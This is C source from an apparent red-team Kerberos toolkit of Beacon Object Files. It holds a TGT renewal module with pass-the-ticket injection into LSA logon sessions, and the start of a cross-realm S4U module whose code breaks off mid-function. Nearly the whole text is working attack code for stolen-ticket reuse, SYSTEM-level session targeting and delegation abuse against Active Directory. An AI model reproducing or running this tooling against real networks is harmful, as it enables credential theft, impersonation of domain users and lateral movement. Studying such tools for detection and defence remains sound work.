FILE: AD-BOF/Kerbeus-BOF/renew/renew.c
================================================
#include "_include/asn_encode.c"
#include "_include/asn_decode.c"
#include "_include/crypt_b64.c"
#include "_include/crypt_dec.c"
#include "_include/connection.c"


HANDLE GetCurrentToken(DWORD DesiredAccess) {
    HANDLE hCurrentToken = NULL;
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), DesiredAccess, FALSE, &hCurrentToken))
        if (hCurrentToken == NULL && KERNEL32$GetLastError() == ERROR_NO_TOKEN)
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), DesiredAccess, &hCurrentToken))
                return NULL;
    return hCurrentToken;
}

LUID GetCurrentLUID(HANDLE TokenHandle) {
    TOKEN_STATISTICS tokenStats;
    DWORD tokenSize;
    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenStatistics, &tokenStats, sizeof(tokenStats), &tokenSize))
        return (LUID) { 0 };
    return tokenStats.AuthenticationId;
}

BOOL IsSystem(HANDLE TokenHandle) {
    UCHAR bTokenUser[sizeof(TOKEN_USER) + 8 + 4 * SID_MAX_SUB_AUTHORITIES];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)bTokenUser;
    ULONG cbTokenUser;
    SID_IDENTIFIER_AUTHORITY siaNT = SECURITY_NT_AUTHORITY;
    PSID pSystemSid = NULL;
    BOOL bSystem = FALSE;

    // Try to open the token of the current thread first
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), TOKEN_QUERY, TRUE, &TokenHandle)) {
        // If there is no thread token, fall back to the process token
        if (KERNEL32$GetLastError() == ERROR_NO_TOKEN) {
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &TokenHandle)) {
                return FALSE;
            }
        } else {
            return FALSE;
        }
    }

    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenUser, pTokenUser, sizeof(bTokenUser), &cbTokenUser)) {
        return FALSE;
    }

    if (!ADVAPI32$AllocateAndInitializeSid(&siaNT, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid)) {
        return FALSE;
    }

    bSystem = ADVAPI32$EqualSid(pTokenUser->User.Sid, pSystemSid);

    ADVAPI32$FreeSid(pSystemSid);

    return bSystem;
}

BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
    HANDLE hLsaLocal = NULL;
    ULONG  mode = 0;
    bool   status = true;
    if (highIntegrity) {
        STRING lsaString = (STRING){ .Length = 8, .MaximumLength = 9, .Buffer = "Winlogon" };
        status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode);
    }
    else {
        status = SECUR32$LsaConnectUntrusted(&hLsaLocal);
    }
    *hLsa = hLsaLocal;
    return status;
}

int my_isdigit(int c) {
    return (c >= '0' && c <= '9');
}

int my_islower(int c) {
    return (c >= 'a' && c <= 'z');
}

long int my_strtol(const char* str, char** endptr, int base) {
    long int result = 0;
    int sign = 1;

    if (*str == '-' || *str == '+') {
        sign = (*str == '-') ? -1 : 1;
        str++;
    }

    while (my_isdigit(*str) ||
           (base == 16 && (*str >= 'a' && *str <= 'f')) ||
           (base == 16 && (*str >= 'A' && *str <= 'F'))) {
        int digit = 0;
        if (my_isdigit(*str)) {
            digit = *str - '0';
        }
        else if (base == 16) {
            digit = (my_islower(*str) ? (*str - 'a' + 10) : (*str - 'A' + 10));
        }

        if (digit >= base)
            break;

        if (result > (LONG_MAX - digit) / base) {
            if (sign == 1)
                return LONG_MAX;
            else
                return LONG_MIN;
        }

        result = result * base + digit;
        str++;
    }

    if (endptr != NULL)
        *endptr = (char*)str;

    return result * sign;
}

void PTT(char* luid, byte* ticket) {
    HANDLE hToken = GetCurrentToken(TOKEN_QUERY);
    LUID   currentLuid = GetCurrentLUID(hToken);
    LUID   targetLuid = { 0 };
    bool   IsHighIntegrity = IsSystem(hToken);

    if (luid) {
        targetLuid.LowPart = my_strtol(luid, NULL, 16);
        if (targetLuid.LowPart == 0 || targetLuid.LowPart == LONG_MAX || targetLuid.LowPart == LONG_MIN) {
            PRINT_OUT("[x] Invalid luid\n");
            return;
        }
    }
    else {
        targetLuid = currentLuid;
    }

    if (!IsHighIntegrity && currentLuid.LowPart != targetLuid.LowPart) {
        PRINT_OUT("[X] You need to be in SYSTEM integrity.\n");
        return;
    }

    if (currentLuid.LowPart != targetLuid.LowPart)
        IsHighIntegrity = false;

    HANDLE hLsa;
    if (GetLsaHandle(hToken, IsHighIntegrity, &hLsa)) return;

    ULONG authPackage;
    LSA_STRING krbAuth = { .Buffer = "kerberos",.Length = 8,.MaximumLength = 9 };
    if (SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage) == 0) {

        int decode_ticket_size = 0;
        byte* decode_ticket = base64_decode(ticket, &decode_ticket_size);

        int submitSize = sizeof(KERB_SUBMIT_TKT_REQUEST) + decode_ticket_size;
        KERB_SUBMIT_TKT_REQUEST* submitRequest = MemAlloc(submitSize);

        submitRequest->MessageType = KerbSubmitTicketMessage;
        submitRequest->KerbCredSize = decode_ticket_size;
        submitRequest->KerbCredOffset = sizeof(KERB_SUBMIT_TKT_REQUEST);
        if (IsHighIntegrity)
            submitRequest->LogonId = targetLuid;
        else
            submitRequest->LogonId = (LUID){ 0 };

        MemCpy((PBYTE)submitRequest + submitRequest->KerbCredOffset, decode_ticket, decode_ticket_size);

        NTSTATUS protocolStatus = 0;
        ULONG    responseSize = 0;
        void* response = 0;
        if (SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, submitRequest, submitSize, &response, &responseSize, &protocolStatus) || protocolStatus)
            PRINT_OUT("\n[X] Ticket not imported.\n");
        else
            PRINT_OUT("\n[+] Ticket successfully imported.\n");
    }
    SECUR32$LsaDeregisterLogonProcess(hLsa);
}

BOOL NewTGS_REP(AsnElt asn_TGS_REP, TGS_REP* tgs_rep) {
    if (asn_TGS_REP.tagValue != KERB_TGS_REP) {
        PRINT_OUT("TGS-REP tag value should be 13");
        return TRUE;
    }
    if ((asn_TGS_REP.subCount != 1) || (asn_TGS_REP.sub[0].tagValue != 16)) {
        PRINT_OUT("First TGS-REP sub should be a sequence");
        return TRUE;
    }

    // extract the KDC-REP out
    AsnElt* kdc_rep = asn_TGS_REP.sub[0].sub;
    for (int i = 0; i < asn_TGS_REP.sub[0].subCount; i++) {
        int tagValue = kdc_rep[i].tagValue;
        if ( tagValue == 0 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->pvno))) return TRUE;
        }
        if ( tagValue == 1 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->msg_type))) return TRUE;
        }
        if ( tagValue == 2 ) {
            if (AsnGetPaData(&(kdc_rep[i].sub[0]), &(tgs_rep->padata))) return TRUE;
        }
        if ( tagValue == 3 ) {
            if (AsnGetString(&(kdc_rep[i].sub[0]), &(tgs_rep->crealm))) return TRUE;
        }
        if ( tagValue == 4 ) {
            if (AsnGetPrincipalName(&(kdc_rep[i].sub[0]), &(tgs_rep->cname))) return TRUE;
        }
        if ( tagValue == 5 ) {
            if (AsnGetTicket(&(kdc_rep[i].sub[0].sub[0]), &(tgs_rep->ticket))) return TRUE;
        }
        if ( tagValue == 6 ) {
            if (AsnGetEncryptedData(&(kdc_rep[i].sub[0]), &(tgs_rep->enc_part))) return TRUE;
        }
    }
    return FALSE;
}


BOOL New_PA_DATA(char* crealm, char* cname, Ticket providedTicket, EncryptionKey clientKey, BOOL opsec, byte* req_body, int req_body_length, PA_DATA* pa_data) {

    AP_REQ* ap_req = MemAlloc(sizeof(AP_REQ));
    if (!ap_req) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    ap_req->pvno = 5;
    ap_req->msg_type = KERB_AP_REQ;
    ap_req->ap_options = 0;
    ap_req->ticket = providedTicket;
    ap_req->keyUsage = KRB_KEY_USAGE_TGS_REQ_PA_AUTHENTICATOR;
    ap_req->key = clientKey;

    DateTime dt = GetGmTimeAdd(0);

    if (my_copybuf(&(ap_req->authenticator.crealm), crealm, my_strlen(crealm) + 1)) return TRUE;

    ap_req->authenticator.authenticator_vno = 5;
    ap_req->authenticator.ctime = dt;
    ap_req->authenticator.cname.name_count = 1;
    ap_req->authenticator.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    ap_req->authenticator.cname.name_string = MemAlloc(sizeof(void*) * ap_req->authenticator.cname.name_count);
    if (!ap_req->authenticator.cname.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    if (my_copybuf(&(ap_req->authenticator.cname.name_string[0]), cname, my_strlen(cname) + 1)) return TRUE;

    pa_data->type = PADATA_AP_REQ;
    pa_data->value = ap_req;
    return FALSE;
}

BOOL NewTGS_REQ(char* userName, char* domain, char* sname, Ticket providedTicket, EncryptionKey clientKey, int requestEType, byte* tgs, BOOL opsec, BOOL u2u, BOOL unconstrained, char* targetDomain, char* s4uUser, BOOL keyList, BOOL renew, byte** reqBytes, int* reqBytesSize) {
    AS_REQ req = { 0 };

    req.pvno = 5;
    req.msg_type = 12;

    req.req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK;
    req.req_body.till = 24 * 3600;		 // valid for 1h
    ADVAPI32$SystemFunction036(&(req.req_body.nonce), 4);

    req.req_body.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
        req.req_body.cname.name_count = 1;
        req.req_body.cname.name_string = MemAlloc(sizeof(void*) * req.req_body.cname.name_count);
        if (!req.req_body.cname.name_string) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        if (my_copybuf(&(req.req_body.cname.name_string[0]), userName, my_strlen(userName) + 1)) return TRUE;
        if (my_copybuf(&targetDomain, domain, my_strlen(domain) + 1)) return TRUE;

    int partsCount = 0;
    char** parts = my_strsplit( sname, '/', &partsCount );

    if (my_copybuf(&req.req_body.realm, targetDomain, my_strlen(targetDomain) + 1)) return TRUE;
    StrToUpper(req.req_body.realm);

    req.req_body.etypes_count = 0;
    int etypeIndex = 0;

    
        req.req_body.etypes_count += 4;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        if (!req.req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        req.req_body.etypes[etypeIndex++] = aes256_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = aes128_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = rc4_hmac;
        req.req_body.etypes[etypeIndex++] = rc4_hmac_exp;

            // service and other unique instance (e.g. krbtgt)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
            req.req_body.sname.name_count = 2;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), domain, my_strlen(domain) + 1);

    if (renew)
        req.req_body.kdc_options = req.req_body.kdc_options | RENEW;

    byte* cksum_Bytes = NULL;
    int cksum_Bytes_length = 0;

    // create the PA-DATA that contains the AP-REQ w/ appropriate authenticator/etc.
    PA_DATA padata = { 0 };
    if (New_PA_DATA(domain, userName, providedTicket, clientKey, opsec, cksum_Bytes, cksum_Bytes_length, &padata)) return TRUE;

    req.pa_data_count = 1 + (opsec && s4uUser) + (s4uUser || opsec || (tgs && !u2u)) + keyList;
    int padata_index = 0;
    req.pa_data = MemAlloc(req.pa_data_count * sizeof(PA_DATA));
    req.pa_data[padata_index++] = padata;

    // Add PA-DATA for KeyList request

    AsnElt reqAsn = { 0 };
    if (ReqToAsnEncode(req, 12, &reqAsn)) return TRUE;
    if (AsnToBytesEncode(&reqAsn, reqBytesSize, reqBytes)) return TRUE;

    if (opsec && s4uUser)
        StrToUpper(domain);

    return FALSE;
}

BOOL AskTGT_ticket(char* userName, char* domain, Ticket providedTicket, EncryptionKey clientKey, BOOL ptt, char* domainController) {

    PRINT_OUT("[*] Building TGS-REQ renewal for: '%s\\%s'\n", domain, userName);

    byte* tgsBytes = NULL;
    int	  tgsBytesLength = 0;
    if (NewTGS_REQ(userName, domain, "krbtgt", providedTicket, clientKey, subkey_keymaterial, NULL, FALSE, FALSE, FALSE, NULL, NULL, FALSE, TRUE, &tgsBytes, &tgsBytesLength)) return TRUE;

    byte* response = NULL;
    int responseSize = 0;
    sendBytes(domainController, "88", tgsBytes, tgsBytesLength, &response, &responseSize);
    if (responseSize == 0)
        return TRUE;

    AsnElt responseAsn = { 0 };
    if (BytesToAsnDecode3(response, responseSize, FALSE, &responseAsn)) return TRUE;

    if (responseAsn.tagValue == KERB_TGS_REP) {
        PRINT_OUT("[+] TGT renewal request successful!\n");

        TGS_REP rep = { 0 };
        if (NewTGS_REP(responseAsn, &rep)) return TRUE;

        byte* outBytes = NULL;
        int  outBytesLength = 0;
        if (decrypt(clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, rep.enc_part.cipher, rep.enc_part.cipher_size, &outBytes, &outBytesLength)) return TRUE;

        AsnElt ae = { 0 };
        if (BytesToAsnDecode3(outBytes, outBytesLength, FALSE, &ae)) return TRUE;

        EncKDCRepPart encRepPart = { 0 };
        if (AsnGetEncKDCRepPart(&(ae.sub[0]), &encRepPart)) return TRUE;

        KRB_CRED cred = { 0 };
        cred.pvno = 5;
        cred.msg_type = 22;

        cred.ticket_count = 1;
        cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
        if (!cred.tickets) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.tickets[0] = rep.ticket;

        KrbCredInfo info = { 0 };

        info.key = encRepPart.key;
        if (my_copybuf(&(info.key.key_value), encRepPart.key.key_value, encRepPart.key.key_size)) return TRUE;

        if (my_copybuf(&(info.prealm), encRepPart.realm, my_strlen(encRepPart.realm) + 1)) return TRUE;

        info.pname = rep.cname;
        info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
        for (int i = 0; i < info.pname.name_count; i++)
            if (my_copybuf(&(info.pname.name_string[i]), rep.cname.name_string[i], my_strlen(rep.cname.name_string[i]) + 1)) return TRUE;

        info.flags = encRepPart.flags;
        info.starttime = encRepPart.starttime;
        info.endtime = encRepPart.endtime;
        info.renew_till = encRepPart.renew_till;

        if (my_copybuf(&(info.srealm), encRepPart.realm, my_strlen(encRepPart.realm) + 1)) return TRUE;

        info.sname = encRepPart.sname;
        info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
        for (int i = 0; i < info.sname.name_count; i++)
            if (my_copybuf(&(info.sname.name_string[i]), encRepPart.sname.name_string[i], my_strlen(encRepPart.sname.name_string[i]) + 1)) return TRUE;

        cred.enc_part.ticket_count = 1;
        cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
        if (!cred.enc_part.ticket_info) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.enc_part.ticket_info[0] = info;

        AsnElt asnCred = { 0 };
        if (AsnKrbCredEncode(&cred, &asnCred)) return TRUE;

        byte* kirbiBytes = NULL;
        int   kirbiBytesSize = 0;
        if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return TRUE;

        char* kirbiString = base64_encode(kirbiBytes, kirbiBytesSize);

        PRINT_OUT("[*] base64(ticket.kirbi):\n\n%s\n\n", kirbiString);

        if (ptt)
            PTT(NULL, kirbiString);

        return FALSE;
    }
    else if (responseAsn.tagValue == KERB_ERROR) {
        uint error_code = 0;
        if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
        PRINT_OUT("\n\t[x] Kerberos error : %s\n", error_code);
//        PRINT_OUT("\n\t[x] Kerberos error : %s\n", lookupKrbErrorCode(error_code));
    }
    else {
        PRINT_OUT("\n[X] Unknown application tag: %d\n", responseAsn.tagValue);
    }
    return FALSE;
}

BOOL ReNewTGT(byte* ticket, char* dc, BOOL ptt) {
    // extract out the info needed for the TGS-REQ/AP-REQ renewal
    int bytesTgtSize = 0;
    byte* bytesTgt = base64_decode(ticket, &bytesTgtSize);

    AsnElt   asn_KRB_CRED = { 0 };
    KRB_CRED kirbi = { 0 };

    if (BytesToAsnDecode3(bytesTgt, bytesTgtSize, FALSE, &asn_KRB_CRED)) return TRUE;

    AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi);

    char* userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
    char* domain = kirbi.enc_part.ticket_info[0].prealm;
    Ticket providedTicket = kirbi.tickets[0];
    EncryptionKey clientKey = kirbi.enc_part.ticket_info[0].key;

    // request the new TGT renewal
    return AskTGT_ticket(userName, domain, providedTicket, clientKey, ptt, dc);
}


void RENEW_RUN( PCHAR Buffer, DWORD Length ) {
    char* ticket = NULL;
    char* dc     = NULL;
    BOOL  ptt    = FALSE;

        for (int i = 0; i < Length; i++) {
            i += GetStrParam(Buffer + i, Length - i, "/dc:", 4, &dc);
            i += GetStrParam(Buffer + i, Length - i, "/ticket:", 8, &ticket);
            i += IsSetParam(Buffer + i, Length - i, "/ptt", 4, &ptt );
        }

    GetDomainInfo(NULL, &dc);
    if (dc == NULL) {
        PRINT_OUT("[X] Could not retrieve domain information!\n\n");
        return;
    }

    if (ticket) {
        PRINT_OUT("[*] Action: Renew Ticket\n\n");
        ReNewTGT(ticket, dc, ptt);
    }
    else {
        PRINT_OUT("\n[X] A /ticket:X needs to be supplied!\r\n");
    }
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        RENEW_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
FILE: AD-BOF/Kerbeus-BOF/s4u/cross_s4u.c
================================================
#include "_include/asn_encode.c"
#include "_include/asn_decode.c"
#include "_include/crypt_b64.c"
#include "_include/crypt_checksum.c"
#include "_include/crypt_dec.c"
#include "_include/connection.c"


void DisplayTicket( KRB_CRED cred, int indentLevel ) {
    DateTime starttime = cred.enc_part.ticket_info[0].starttime;
    DateTime endtime = cred.enc_part.ticket_info[0].endtime;
    DateTime renew_till = cred.enc_part.ticket_info[0].renew_till;
    uint flags = cred.enc_part.ticket_info[0].flags;

    if (cred.enc_part.ticket_info[0].sname.name_count == 1)
        PRINT_OUT("  ServiceName              :  %s\n", cred.enc_part.ticket_info[0].sname.name_string[0]);
    else if (cred.enc_part.ticket_info[0].sname.name_count > 1)
        PRINT_OUT("  ServiceName              :  %s/%s\n", cred.enc_part.ticket_info[0].sname.name_string[0], cred.enc_part.ticket_info[0].sname.name_string[1]);

    PRINT_OUT("  ServiceRealm             :  %s\n", cred.enc_part.ticket_info[0].srealm);

    if (cred.enc_part.ticket_info[0].pname.name_count == 1)
        PRINT_OUT("  UserName                 :  %s\n", cred.enc_part.ticket_info[0].pname.name_string[0]);
    else if (cred.enc_part.ticket_info[0].pname.name_count > 1)
        PRINT_OUT("  UserName                 :  %s@%s\n", cred.enc_part.ticket_info[0].pname.name_string[0], cred.enc_part.ticket_info[0].pname.name_string[1]);

    PRINT_OUT("  UserRealm                :  %s\n", cred.enc_part.ticket_info[0].prealm);
    PRINT_OUT("  StartTime (UTC)          :  %02d.%02d.%04d %d:%d:%d\n", starttime.day, starttime.month, starttime.year, starttime.hour, starttime.minute, starttime.second);
    PRINT_OUT("  EndTime (UTC)            :  %02d.%02d.%04d %d:%d:%d\n", endtime.day, endtime.month, endtime.year, endtime.hour, endtime.minute, endtime.second);
    PRINT_OUT("  RenewTill (UTC)          :  %02d.%02d.%04d %d:%d:%d\n", renew_till.day, renew_till.month, renew_till.year, renew_till.hour, renew_till.minute, renew_till.second);

    PRINT_OUT("  Flags                    :  ");
    if (flags & reserved)		PRINT_OUT("reserved ");
    if (flags & forwardable)	PRINT_OUT("forwardable ");
    if (flags & forwarded)		PRINT_OUT("forwarded ");
    if (flags & proxiable)		PRINT_OUT("proxiable ");
    if (flags & proxy)			PRINT_OUT("proxy ");
    if (flags & may_postdate)	PRINT_OUT("may_postdate ");
    if (flags & postdated)		PRINT_OUT("postdated ");
    if (flags & invalid)		PRINT_OUT("invalid ");
    if (flags & renewable)		PRINT_OUT("renewable ");
    if (flags & initial)		PRINT_OUT("initial ");
    if (flags & pre_authent)	PRINT_OUT("pre_authent ");
    if (flags & hw_authent)		PRINT_OUT("hw_authent ");
    if (flags & ok_as_delegate) PRINT_OUT("ok_as_delegate ");
    if (flags & anonymous)		PRINT_OUT("anonymous ");
    if (flags & enc_pa_rep)		PRINT_OUT("enc_pa_rep ");
    if (flags & reserved1)		PRINT_OUT("reserved1 ");
    PRINT_OUT("\n");

    if (cred.enc_part.ticket_info[0].key.key_type == rc4_hmac)
        PRINT_OUT("  KeyType                  :  rc4_hmac\n");
    else if (cred.enc_part.ticket_info[0].key.key_type == aes128_cts_hmac_sha1)
        PRINT_OUT("  KeyType                  :  aes128_cts_hmac_sha1\n");
    else if (cred.enc_part.ticket_info[0].key.key_type == aes256_cts_hmac_sha1)
        PRINT_OUT("  KeyType                  :  aes256_cts_hmac_sha1\n");
}

void DescribeTicket(byte* ticket_b64) {
    int bytesSize = 0;
    byte* bytes = base64_decode(ticket_b64, &bytesSize);

    KRB_CRED kirbi = { 0 };
    AsnElt   asn_KRB_CRED = { 0 };
    if (BytesToAsnDecode3(bytes, bytesSize, false, &asn_KRB_CRED)) return;
    if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi)) return;
    DisplayTicket(kirbi, 2);
}


HANDLE GetCurrentToken(DWORD DesiredAccess) {
    HANDLE hCurrentToken = NULL;
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), DesiredAccess, FALSE, &hCurrentToken))
        if (hCurrentToken == NULL && KERNEL32$GetLastError() == ERROR_NO_TOKEN)
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), DesiredAccess, &hCurrentToken))
                return NULL;
    return hCurrentToken;
}

LUID GetCurrentLUID(HANDLE TokenHandle) {
    TOKEN_STATISTICS tokenStats;
    DWORD tokenSize;
    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenStatistics, &tokenStats, sizeof(tokenStats), &tokenSize))
        return (LUID) { 0 };
    return tokenStats.AuthenticationId;
}

BOOL IsSystem(HANDLE TokenHandle) {
    UCHAR bTokenUser[sizeof(TOKEN_USER) + 8 + 4 * SID_MAX_SUB_AUTHORITIES];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)bTokenUser;
    ULONG cbTokenUser;
    SID_IDENTIFIER_AUTHORITY siaNT = SECURITY_NT_AUTHORITY;
    PSID pSystemSid = NULL;
    BOOL bSystem = FALSE;

    // Try to open the token of the current thread first
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), TOKEN_QUERY, TRUE, &TokenHandle)) {
        // If there is no thread token, fall back to the process token
        if (KERNEL32$GetLastError() == ERROR_NO_TOKEN) {
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &TokenHandle)) {
                return FALSE;
            }
        } else {
            return FALSE;
        }
    }

    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenUser, pTokenUser, sizeof(bTokenUser), &cbTokenUser)) {
        return FALSE;
    }

    if (!ADVAPI32$AllocateAndInitializeSid(&siaNT, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid)) {
        return FALSE;
    }

    bSystem = ADVAPI32$EqualSid(pTokenUser->User.Sid, pSystemSid);

    ADVAPI32$FreeSid(pSystemSid);

    return bSystem;
}

BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
    HANDLE hLsaLocal = NULL;
    ULONG  mode = 0;
    bool   status = TRUE;
    if (highIntegrity) {
        STRING lsaString = (STRING){ .Length = 8, .MaximumLength = 9, .Buffer = "Winlogon" };
        status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode);
    }
    else {
        status = SECUR32$LsaConnectUntrusted(&hLsaLocal);
    }
    *hLsa = hLsaLocal;
    return status;
}

int my_isdigit(int c) {
    return (c >= '0' && c <= '9');
}

int my_islower(int c) {
    return (c >= 'a' && c <= 'z');
}

long int my_strtol(const char* str, char** endptr, int base) {
    long int result = 0;
    int sign = 1;

    if (*str == '-' || *str == '+') {
        sign = (*str == '-') ? -1 : 1;
        str++;
    }

    while (my_isdigit(*str) ||
           (base == 16 && (*str >= 'a' && *str <= 'f')) ||
           (base == 16 && (*str >= 'A' && *str <= 'F'))) {
        int digit = 0;
        if (my_isdigit(*str)) {
            digit = *str - '0';
        }
        else if (base == 16) {
            digit = (my_islower(*str) ? (*str - 'a' + 10) : (*str - 'A' + 10));
        }

        if (digit >= base)
            break;

        if (result > (LONG_MAX - digit) / base) {
            if (sign == 1)
                return LONG_MAX;
            else
                return LONG_MIN;
        }

        result = result * base + digit;
        str++;
    }

    if (endptr != NULL)
        *endptr = (char*)str;

    return result * sign;
}

void PTT(char* luid, byte* ticket) {
    HANDLE hToken = GetCurrentToken(TOKEN_QUERY);
    LUID   currentLuid = GetCurrentLUID(hToken);
    LUID   targetLuid = { 0 };
    bool   IsHighIntegrity = IsSystem(hToken);

    if (luid) {
        targetLuid.LowPart = my_strtol(luid, NULL, 16);
        if (targetLuid.LowPart == 0 || targetLuid.LowPart == LONG_MAX || targetLuid.LowPart == LONG_MIN) {
            PRINT_OUT("[x] Invalid luid\n");
            return;
        }
    }
    else {
        targetLuid = currentLuid;
    }

    if (!IsHighIntegrity && currentLuid.LowPart != targetLuid.LowPart) {
        PRINT_OUT("[X] You need to be in SYSTEM integrity.\n");
        return;
    }

    if (currentLuid.LowPart != targetLuid.LowPart)
        IsHighIntegrity = FALSE;

    HANDLE hLsa;
    if (GetLsaHandle(hToken, IsHighIntegrity, &hLsa)) return;

    ULONG authPackage;
    LSA_STRING krbAuth = { .Buffer = "kerberos",.Length = 8,.MaximumLength = 9 };
    if (SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage) == 0) {

        int decode_ticket_size = 0;
        byte* decode_ticket = base64_decode(ticket, &decode_ticket_size);

        int submitSize = sizeof(KERB_SUBMIT_TKT_REQUEST) + decode_ticket_size;
        KERB_SUBMIT_TKT_REQUEST* submitRequest = MemAlloc(submitSize);

        submitRequest->MessageType = KerbSubmitTicketMessage;
        submitRequest->KerbCredSize = decode_ticket_size;
        submitRequest->KerbCredOffset = sizeof(KERB_SUBMIT_TKT_REQUEST);
        if (IsHighIntegrity)
            submitRequest->LogonId = targetLuid;
        else
            submitRequest->LogonId = (LUID){ 0 };

        MemCpy((PBYTE)submitRequest + submitRequest->KerbCredOffset, decode_ticket, decode_ticket_size);

        NTSTATUS protocolStatus = 0;
        ULONG    responseSize = 0;
        void* response = 0;
        if (SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, submitRequest, submitSize, &response, &responseSize, &protocolStatus) || protocolStatus)
            PRINT_OUT("\n[X] Ticket not imported.\n");
        else
            PRINT_OUT("\n[+] Ticket successfully imported.\n");
    }
    SECUR32$LsaDeregisterLogonProcess(hLsa);
}



byte* ADRestrictionEntry_buildTokenStruct(uint flags, uint tokenIL) {
    byte* data = MemAlloc(40);

    data[0] = (byte)(flags >> 24);
    data[1] = (byte)(flags >> 16);
    data[2] = (byte)(flags >> 8);
    data[3] = (byte)(flags);
    data[4] = (byte)(tokenIL >> 24);
    data[5] = (byte)(tokenIL >> 16);
    data[6] = (byte)(tokenIL >> 8);
    data[7] = (byte)(tokenIL);
    ADVAPI32$SystemFunction036(data + 8, 32);
    return data;
}



BOOL New_PA_DATA_s4uX509user(EncryptionKey key, char* name, char* realm, uint nonce, int eType, PA_DATA* pa_data) {

    PA_S4U_X509_USER* pa = MemAlloc(sizeof(PA_S4U_X509_USER));
    pa->user_id.nonce = nonce;
    pa->user_id.options = 0x20000000;
    if (my_copybuf(&(pa->user_id.crealm), realm, my_strlen(realm) + 1)) return TRUE;
    pa->user_id.cname.name_type = PRINCIPAL_NT_ENTERPRISE;
    pa->user_id.cname.name_count = 1;
    pa->user_id.cname.name_string = MemAlloc(sizeof(void*) * pa->user_id.cname.name_count);
    if (my_copybuf(&(pa->user_id.cname.name_string[0]), name, my_strlen(name) + 1)) return TRUE;

    AsnElt userIDAsn = { 0 }, userIDSeq = { 0 };
    if (AsnS4UUserIDEncode(&(pa->user_id), &userIDAsn)) return TRUE;
    if (Make3(ASN_SEQUENCE, &userIDAsn, 1, &userIDSeq)) return TRUE;

    int userIDBytes_length = ValueLength(&userIDSeq);
    byte* userIDBytes = MemAlloc(userIDBytes_length);
    userIDBytes_length = EncodeValue(&userIDSeq, 0, userIDBytes_length, userIDBytes, 0);

    byte* cksumBytes = NULL;
    int cksumBytesLength = 0;

    if (eType == aes256_cts_hmac_sha1)
        if (checksum(key.key_value, key.key_size, userIDBytes, userIDBytes_length, KERB_CHECKSUM_HMAC_SHA1_96_AES256, KRB_KEY_USAGE_PA_S4U_X509_USER, &cksumBytes, &cksumBytesLength)) return TRUE;
    if (eType == aes128_cts_hmac_sha1)
        if (checksum(key.key_value, key.key_size, userIDBytes, userIDBytes_length, KERB_CHECKSUM_HMAC_SHA1_96_AES128, KRB_KEY_USAGE_PA_S4U_X509_USER, &cksumBytes, &cksumBytesLength)) return TRUE;
    if (eType == rc4_hmac)
